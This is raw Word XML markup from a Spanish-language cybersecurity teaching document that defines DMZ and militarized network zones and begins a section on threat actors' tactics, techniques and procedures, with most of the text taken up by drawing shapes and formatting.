                            <a:pathLst>
                              <a:path w="4021454" h="111125">
                                <a:moveTo>
                                  <a:pt x="3983300" y="55372"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3916679" y="94234"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3915155" y="100075"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3920490" y="109220"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3926331" y="110744"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4004881" y="64897"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4002404" y="64897"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4002404" y="63626"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3997452" y="63626"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3983300" y="55372"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="4021454" h="111125">
                                <a:moveTo>
                                  <a:pt x="3966972" y="45847"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="45847"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="64897"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3966972" y="64897"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3983300" y="55372"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3966972" y="45847"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="4021454" h="111125">
                                <a:moveTo>
                                  <a:pt x="4004882" y="45847"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4002404" y="45847"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4002404" y="64897"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4004881" y="64897"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4021201" y="55372"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4004882" y="45847"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="4021454" h="111125">
                                <a:moveTo>
                                  <a:pt x="3997452" y="47117"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3983300" y="55372"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3997452" y="63626"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3997452" y="47117"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="4021454" h="111125">
                                <a:moveTo>
                                  <a:pt x="4002404" y="47117"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3997452" y="47117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3997452" y="63626"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4002404" y="63626"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4002404" y="47117"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="4021454" h="111125">
                                <a:moveTo>
                                  <a:pt x="3926331" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3920490" y="1524"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3915155" y="10668"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3916679" y="16510"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3983300" y="55372"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3997452" y="47117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4002404" y="47117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4002404" y="45847"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4004882" y="45847"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="392633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3" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="3867150" y="0"/>
                            <a:ext cx="3806952" cy="1656588"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="82" name="Textbox 82"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4524628" y="2101240"/>
                            <a:ext cx="1226185" cy="229235"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="51DB1DF8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:line="360" w:lineRule="exact"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t>Vulnerabilidad</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="4015DCE2" id="Group 75" o:spid="_x0000_s1076" style="position:absolute;margin-left:198.9pt;margin-top:22.3pt;width:656.3pt;height:233.4pt;z-index:-15715840;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordsize="8335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">
                <v:shape id="Graphic 76" o:spid="_x0000_s1077" style="position:absolute;left:65968;top:14474;width:17380;height:14783;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1737995,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" path="m1259941,1347575r-782033,l477908,1477985r782033,l1259941,1347575xem1042710,1217164r-347570,l695140,1347575r347570,l1042710,1217164xem1650957,l86892,,53153,6860,25524,25538,6856,53183,,86940,,1130224r6856,33757l25524,1191625r27629,18679l86892,1217164r1564065,l1684696,1210304r27629,-18679l1730994,1163981r6856,-33757l1737850,1086754r-1607512,l130338,130410r1607512,l1737850,86940r-6856,-33757l1712325,25538,1684696,6860,1650957,xem1737850,130410r-130339,l1607511,1086754r130339,l1737850,130410xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 77" o:spid="_x0000_s1078" style="position:absolute;left:40197;top:15122;width:23889;height:14453;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="238887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" path="m216727,475559r-3429,-41693l216601,393136r9653,-39354l241878,316217r21214,-35364l289514,248102r31252,-29723l356465,192095r39767,-22431l439686,151498r46760,-13489l536132,129611r49729,-2806l635253,129443r48418,7977l730473,150635r44546,18346l804056,132251r35473,-31008l880312,76243,925278,57537,973301,45410r49952,-5263l1074008,42034r50430,9321l1173418,68397r36084,18606l1241871,109799r26078,-34063l1300736,47506r38192,-22039l1381222,9977r45092,-8584l1472900,71r46777,6299l1565340,20645r46038,24686l1649414,77922r34503,-27922l1722790,28172r42176,-15659l1809377,3097,1854958,r45681,3293l1945355,13053r42683,16301l2027620,52268r32633,27093l2086564,110419r19477,34272l2118171,181427r49880,15274l2212568,218420r38572,27321l2283184,277819r24931,35991l2325351,352868r8957,41282l2334404,436810r-9350,43194l2322201,488148r-3211,8049l2315446,504150r-3854,7858l2342052,550170r22800,40401l2380099,632542r7797,42871l2388350,718514r-6785,42662l2367648,802727r-20944,39773l2318837,879823r-34684,34205l2242758,944443r-39935,22021l2159970,984020r-45210,12912l2067752,1005022r-4594,42678l2050654,1088126r-19748,37637l2004575,1160074r-32247,30448l1934826,1216569r-42092,21109l1846716,1253313r-49282,9622l1745553,1266007r-43858,-2766l1658908,1255593r-41121,-12410l1578929,1226129r-17925,39218l1537442,1301368r-28644,32577l1475627,1362833r-37144,24955l1397923,1408565r-43424,16353l1308767,1436601r-47484,6770l1212599,1444981r-49327,-3794l1113855,1431742r-48153,-15058l1020841,1396438r-40991,-25073l943310,1341822r-31512,-33651l867681,1327324r-45516,14519l775687,1351819r-47000,5523l681605,1358503r-46726,-3112l588949,1348097r-44697,-11386l501229,1321324r-40910,-19299l421960,1278905r-35368,-26851l354653,1221563r-28071,-34042l323534,1183330r-1524,-2159l273237,1181854r-46540,-7108l183466,1160548r-38843,-20588l111245,1113680,84409,1082409,65194,1046846,54675,1007689r-385,-43120l65121,922853,86572,883995r31476,-34548l73791,821875,39338,787819,15208,748910,1922,706782,,663068,9960,619401,32323,577413,66429,540032r43095,-29357l159643,490367r55179,-10236l216727,475559xem260542,870402r-36492,66l188152,865973r-34659,-8947l120715,843732em384113,1162121r-14922,4451l353983,1170202r-15447,2796l322899,1174948em911671,1302329r-10614,-13948l891336,1273993r-8793,-14794l874714,1244036em1593915,1157168r-2141,16215l1588597,1189442r-4201,15893l1579183,1221049e" filled="f" strokecolor="#6fac46" strokeweight="1pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Image 78" o:spid="_x0000_s1079" type="#_x0000_t75" style="position:absolute;left:59001;top:22686;width:1923;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">
                  <v:imagedata r:id="rId34" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 79" o:spid="_x0000_s1080" style="position:absolute;left:42365;top:15854;width:20936;height:5252;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="209359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" path="m2093595,435229r-15181,25134l2059876,483806r-21681,21538l2013584,524764em1901698,103251r1976,10501l1905031,124301r738,10596l1905888,145542em1390903,53975r8446,-14399l1409033,25749r10874,-13208l1431925,em1007618,79629r3669,-11996l1015825,55864r5419,-11508l1027556,33147em557910,95377r19160,9919l595455,116157r17552,11741l629666,140462em12446,449834l8447,438144,5032,426323,2212,414383,,402336e" filled="f" strokecolor="#6fac46" strokeweight="1pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 80" o:spid="_x0000_s1081" style="position:absolute;top:19083;width:40214;height:1111;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4021454,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" path="m3983300,55372r-66621,38862l3915155,100075r5335,9145l3926331,110744r78550,-45847l4002404,64897r,-1271l3997452,63626r-14152,-8254xem3966972,45847l,45847,,64897r3966972,l3983300,55372r-16328,-9525xem4004882,45847r-2478,l4002404,64897r2477,l4021201,55372r-16319,-9525xem3997452,47117r-14152,8255l3997452,63626r,-16509xem4002404,47117r-4952,l3997452,63626r4952,l4002404,47117xem3926331,r-5841,1524l3915155,10668r1524,5842l3983300,55372r14152,-8255l4002404,47117r,-1270l4004882,45847,3926331,xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Image 81" o:spid="_x0000_s1082" type="#_x0000_t75" style="position:absolute;left:38671;width:38070;height:1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">
                  <v:imagedata r:id="rId35" o:title=""/>
                </v:shape>
                <v:shape id="Textbox 82" o:spid="_x0000_s1083" type="#_x0000_t202" style="position:absolute;left:45246;top:21012;width:1226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1DB1DF8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:line="360" w:lineRule="exact"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>Vulnerabilidad</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FABEFA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="800" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="293" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297D5DB4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1328"/>
        </w:tabs>
        <w:spacing w:before="60"/>
        <w:ind w:left="1328" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Red de Zonas Desmilitarizadas (Red DMZ):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498096E9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="209"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="652A3E49" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2047"/>
          <w:tab w:val="left" w:pos="2049"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="776"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Es una red (física o lógica) que se utiliza para conectar hosts que proporcionan una interfaz a una red externa que no es de confianza</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A467F7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E35225B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="170"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3773DCAB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2047"/>
          <w:tab w:val="left" w:pos="2049"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1452"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Los sistemas que son más vulnerables a los ataques son aquellos que proporcionan servicios a los usuarios fuera de la red de área local, como el </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">correo electrónico, la Web </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">y  los </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">servidores del Sistema de Nombres de Dominio (DNS) </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>que están presentes dentro de una DMZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E55D44" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6437EF0A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="173"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50DA3DDB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2047"/>
          <w:tab w:val="left" w:pos="2049"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="953"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El objetivo final de una DMZ es permitir el acceso a los recursos de redes que no son de confianza mientras se mantiene segura la red privada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F83D1A0"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820" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="293" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0DC383" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1223"/>
        </w:tabs>
        <w:spacing w:before="305"/>
        <w:ind w:left="1223" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Red de Zonas Militarizadas (Red MZ) :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E125102" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="209"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FBA7A18" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1944"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1944" w:right="2343" w:hanging="361"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Zona que tiene la máxima seguridad y es uno de los segmentos más seguros del entorno.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEA9F51" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66EED3E5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="116"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7343E090" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1944"/>
        </w:tabs>
        <w:ind w:left="1944"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Contiene información crítica sobre la organización, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0AF57E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55789BF1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="98"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F035D19" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1944"/>
        </w:tabs>
        <w:ind w:left="1944"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Todas las operaciones de la organización se gestionan desde la red militarizada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1734D1"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293" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0851FA44" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1268"/>
        </w:tabs>
        <w:spacing w:before="50"/>
        <w:ind w:left="1268" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tácticas, Técnicas y Procedimientos (TTPs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFAA8FE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="153"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A31EB24" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1988"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1988" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>TTP explica cómo los actores de amenazas orquestan y gestionan los ciberataques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1816C03D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="121"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BD996D0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
